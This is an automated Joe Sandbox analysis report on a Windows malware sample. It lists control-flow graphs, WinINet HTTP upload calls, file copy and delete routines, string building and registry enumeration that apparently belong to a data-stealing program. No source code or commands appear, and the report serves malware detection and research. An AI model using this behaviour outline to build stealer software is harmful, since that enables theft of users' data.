                                                                                                                                                                                                                              control_flow_graph 1215 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1230 4056d4-4056d8 1215->1230 1231 4056cd 1215->1231 1232 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 1230->1232 1233 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1230->1233 1231->1230 1242 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 1232->1242 1243 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 1232->1243 1233->1232 1317 40585c-40586a 1233->1317 1243->1242 1318 405878 1317->1318 1319 40586c-405876 1317->1319 1320 405882-4058b5 HttpOpenRequestA 1318->1320 1319->1320 1321 405c63-405c6a InternetCloseHandle 1320->1321 1322 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 1320->1322 1321->1232 1431 405be2-405c0c InternetReadFile 1322->1431 1432 405c17-405c5d InternetCloseHandle 1431->1432 1433 405c0e-405c15 1431->1433 1432->1321 1433->1432 1434 405c19-405c57 call 416fb0 call 416ea0 call 416e00 1433->1434 1434->1431
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,042F0A68), ref: 004056C3
                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,042F0AA8,00000000,?,042F7B58,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,042F0A48,?,042F84A0,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                              • String ID: "$"$------$------$------$-A$-A$J&f
                                                                                                                                                                                                                              • API String ID: 148854478-1022722094
                                                                                                                                                                                                                              • Opcode ID: 973b8a43593daf1daacf6c7f5fe3cc353c6d700f755c7d0dae3ca370f4ba0e22
                                                                                                                                                                                                                              • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 973b8a43593daf1daacf6c7f5fe3cc353c6d700f755c7d0dae3ca370f4ba0e22
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1888 40a030-40a04c call 417070 1891 40a05d-40a071 call 417070 1888->1891 1892 40a04e-40a05b call 416e20 1888->1892 1898 40a082-40a096 call 417070 1891->1898 1899 40a073-40a080 call 416e20 1891->1899 1897 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1892->1897 1931 40a12d-40a134 1897->1931 1898->1897 1907 40a098-40a0b8 call 416e00 * 3 call 413220 1898->1907 1899->1897 1925 40a6cf-40a6d2 1907->1925 1932 40a170-40a184 call 416d40 1931->1932 1933 40a136-40a152 call 4170d0 * 2 CopyFileA 1931->1933 1938 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1932->1938 1939 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1932->1939 1946 40a154-40a16e call 416da0 call 415bd0 1933->1946 1947 40a16c 1933->1947 1997 40a319-40a331 call 4170d0 1938->1997 1939->1997 1946->1931 1947->1932 2006 40a680-40a692 call 4170d0 DeleteFileA call 417040 1997->2006 2007 40a337-40a355 1997->2007 2018 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 2006->2018 2016 40a666-40a676 2007->2016 2017 40a35b-40a36f GetProcessHeap RtlAllocateHeap 2007->2017 2025 40a67d 2016->2025 2019 40a372-40a382 2017->2019 2018->1925 2026 40a601-40a60e lstrlen 2019->2026 2027 40a388-40a42a call 416d40 * 6 call 417070 2019->2027 2025->2006 2029 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0 2026->2029 2030 40a655-40a663 memset 2026->2030 2067 40a42c-40a43b call 416e20 2027->2067 2068 40a43d-40a446 call 416e20 2027->2068 2045 40a647-40a650 call 416e00 2029->2045 2030->2016 2045->2030 2072 40a44b-40a45d call 417070 2067->2072 2068->2072 2075 40a470-40a479 call 416e20 2072->2075 2076 40a45f-40a46e call 416e20 2072->2076 2080 40a47e-40a48e call 4170b0 2075->2080 2076->2080 2083 40a490-40a498 call 416e20 2080->2083 2084 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 2080->2084 2083->2084 2084->2019
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2228671196-0
                                                                                                                                                                                                                              • Opcode ID: 4724f57c80c5ccb517ebe5cb1bf81a9d293302537db6e20a181496a60ca8227d
                                                                                                                                                                                                                              • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4724f57c80c5ccb517ebe5cb1bf81a9d293302537db6e20a181496a60ca8227d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1973479514-0
                                                                                                                                                                                                                              • Opcode ID: c8164160b88f97020f9c5aff05177b0a5368b1f620fec4bba8d6403bb6f38b9b
                                                                                                                                                                                                                              • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8164160b88f97020f9c5aff05177b0a5368b1f620fec4bba8d6403bb6f38b9b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2283 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 2298 404604 2283->2298 2299 40460b-40460f 2283->2299 2298->2299 2300 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 2299->2300 2301 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 2299->2301 2300->2301 2387 404793-404797 2300->2387 2310 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 2301->2310 2311 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 2301->2311 2311->2310 2388 4047a5 2387->2388 2389 404799-4047a3 2387->2389 2390 4047af-4047e2 HttpOpenRequestA 2388->2390 2389->2390 2391 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 2390->2391 2392 404b7e-404b85 InternetCloseHandle 2390->2392 2503 404af2-404b1c InternetReadFile 2391->2503 2392->2301 2504 404b27-404b79 InternetCloseHandle call 416e00 2503->2504 2505 404b1e-404b25 2503->2505 2504->2392 2505->2504 2506 404b29-404b67 call 416fb0 call 416ea0 call 416e00 2505->2506 2506->2503
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,042F0A68), ref: 004045FA
                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,042F0A98), ref: 00404AA8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,042F0A48,?,042F84A0,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                              • String ID: "$"$------$------$------$J&f
                                                                                                                                                                                                                              • API String ID: 460715078-2398766951
                                                                                                                                                                                                                              • Opcode ID: f878f56f84ba45d93086740d51afd7e7722ca98a989a2cce51332dd5e7a994cd
                                                                                                                                                                                                                              • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f878f56f84ba45d93086740d51afd7e7722ca98a989a2cce51332dd5e7a994cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,042F3428,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                                              • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                              • Opcode ID: 5006b39ac59f030e58fb0d02e9c357e1868f6499d590eaa67df8c9110744e5f6
                                                                                                                                                                                                                              • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5006b39ac59f030e58fb0d02e9c357e1868f6499d590eaa67df8c9110744e5f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
